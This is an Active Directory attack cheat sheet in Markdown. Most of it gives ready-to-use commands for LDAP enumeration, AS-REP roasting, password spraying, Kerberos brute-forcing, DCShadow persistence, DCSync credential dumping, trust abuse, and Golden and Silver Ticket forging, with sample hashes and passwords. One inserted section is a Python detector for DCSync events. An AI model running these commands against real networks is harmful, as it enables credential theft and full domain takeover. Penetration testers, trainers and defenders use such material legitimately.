# AD Related

![](https://pbs.twimg.com/media/CNiCKDaUwAAPXqD?format=jpg\&name=900x900)

## Enumeration

Basic LDAP enumeration

* <https://github.com/cddmp/enum4linux-ng>
* <https://github.com/ropnop/windapsearch>
* <https://github.com/CroweCybersecurity/ad-ldap-enum>

```sh
python3 /opt/enum4linux-ng/enum4linux-ng.py -A 1.3.3.7 -p Password123 -u morph3
python windapsearch.py -u morph3 -p morph3 -d evil.corp --dc-ip 192.168.1.2
python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd
```

## LDAP Queries

Get all the users

```
Get-ADUser -LDAPFilter "(objectClass=user)"
```

Dump LDAP fully

```
export LDAPTLS_REQCERT=never
ldapsearch -LLL -x -H ldaps://dc.foobar.local -b 'dc=foobar,dc=local' -s sub '(objectclass=*)' -D 'test@foobar.local' -w foobar
```

## AS-REP Roasting

If a user has the "Do not require Kerberos preauthentication" option enabled, you can grab their AS-REP hash

```
impacket-GetNPUsers ecorp.local/ -format hashcat -usersfile ./users -dc-ip 10.3.3.7
```

## Bruteforcing - Password Spraying

* <https://github.com/dafthack/DomainPasswordSpray>

```powershell
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
```

## Kerbrute

Kerberos (port 88) brute-forcing

* <https://github.com/ropnop/kerbrute>
* <https://github.com/ropnop/kerbrute/releases/tag/v1.0.3>

```
# Password brute
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3

# Username brute
./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt

# Password spray
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt
```

## DCShadow

* <https://attack.stealthbits.com/how-dcshadow-persistence-attack-works>

This is a persistence attack.

The DCShadow attack injects rogue Domain Controllers into the AD infrastructure so that changes can be pushed to actual AD objects through replication.

Find the SID for that user

```
wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
```

This will create an RPC server and listen

```
lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid
```

Run this from another mimikatz instance

```
lsadump::dcshadow /push
```

After this, the rogue DC must be unregistered. Log in again and perform DCSync

```
lsadump::dcsync /domain:ECORP.local /account:krbtgt
```

## DCSync

Using mimikatz,

```
lsadump::dcsync /domain:domain /all /csv
lsadump::dcsync /user:krbtgt
```

Using Invoke-DCSync.ps1,

* <https://gist.github.com/monoxgas/9d238accd969550136db>

```
powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"
```

Using the secretsdump module from impacket,

```sh
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL
impacket-secretsdump morph3@10.11.1.75
```
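Detection for the DCSync technique above, as an added example that is not part of the original notes: a domain controller logs Event ID 4662 when an account exercises a control-access right on the domain object, so a replication-right GUID requested by anything other than a known DC machine account is the signal. The replication GUIDs are Microsoft's documented extended-rights values; the event samples and the DC inventory (`SAMPLE_EVENTS`, `KNOWN_DCS`) are constructed for the example.

```python
# Extended-rights GUIDs that grant directory replication (Microsoft's AD
# control-access rights); any of them in a 4662 "Properties" field means the
# subject asked a DC to replicate, which is exactly what DCSync does.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample events (not real logs) in the shape a SIEM extracts from a
# DC's Security log; field names follow the Windows event XML, values are made up.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "ECORP",
     "IpAddress": "10.0.0.1", "ObjectName": "DC=ecorp,DC=local",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "morph3", "SubjectDomainName": "ECORP",
     "IpAddress": "10.11.1.75", "ObjectName": "DC=ecorp,DC=local",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Ordinary attribute read; the GUID below is a constructed placeholder.
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "ECORP",
     "IpAddress": "10.0.0.55", "ObjectName": "CN=jdoe,OU=Users,DC=ecorp,DC=local",
     "Properties": "Read Property {00000000-0000-0000-0000-00000000abcd}"},
    {"EventID": 4624, "SubjectUserName": "morph3", "SubjectDomainName": "ECORP"},
]

# Machine accounts of the real DCs (assumed inventory) replicate legitimately;
# add other known replicators (e.g. a directory-sync service account) here.
KNOWN_DCS = {"DC01$"}


def detect_dcsync(events, known_replicators):
    """Return one alert per 4662 event that requests a replication right
    from an account that is not an expected replicator."""
    allow = {a.upper() for a in known_replicators}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if not rights or ev["SubjectUserName"].upper() in allow:
            continue
        alerts.append({
            "account": f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}",
            "source_ip": ev.get("IpAddress", "-"),
            "object": ev.get("ObjectName", "-"),
            "rights": rights,
        })
    return alerts
```

Calling `detect_dcsync(SAMPLE_EVENTS, KNOWN_DCS)` flags only the `ECORP\morph3` request from 10.11.1.75; auditing 4662 requires the "Audit Directory Service Access" subcategory and a SACL on the domain object for these rights, otherwise the events never appear.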

## Domain Trust

Enumerate trusts with PowerView:

```
Get-DomainTrustMapping
```

Get the current or target domain SID using `Get-DomainSID`

```
kerberos::golden /user:Administrator /domain:<curr_domain> /sid:<curr_domain_sid> /krbtgt:<curr_domain_krbtgt_hash> /sids:<target_domain_sid> /ptt
```

## Golden Ticket

With the krbtgt hash you can forge tickets for anyone.

Get the krbtgt hash,

```
lsadump::dcsync /all /csv
```

You might want to patch it

```
lsadump::lsa /patch
lsadump::trust /patch
```

Forging the ticket

* /rc4 or /krbtgt -> krbtgt hash
* /sid -> Get-DomainSID
* /ticket -> optional; default is ticket.kirbi
* /groups -> optional; default is 513,512,520,518,519
* /ptt -> switch to perform pass-the-ticket

```
kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519
kerberos::ptt ticket.kirbi
```

After this, your final ticket should be ready. You can verify that it is in your cache with the following command.

```
klist
```

You can now verify it is working.

```
dir \\DC\C$
psexec.exe \\DC cmd.exe
```

Purge it

```
kerberos::purge
```

If you want to use Metasploit

```
post/windows/escalate/golden_ticket
```

## Silver Ticket

Forged for service accounts

Using impacket's ticketer,

```
python3 /opt/impacket/examples/ticketer.py -domain scrm.local -user sqlsvc -password Pegasus60 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 ksimpson -spn MSSQLSvc/dc1.scrm.local -nthash B999A16500B87D17EC7F2E2A68778F05
```
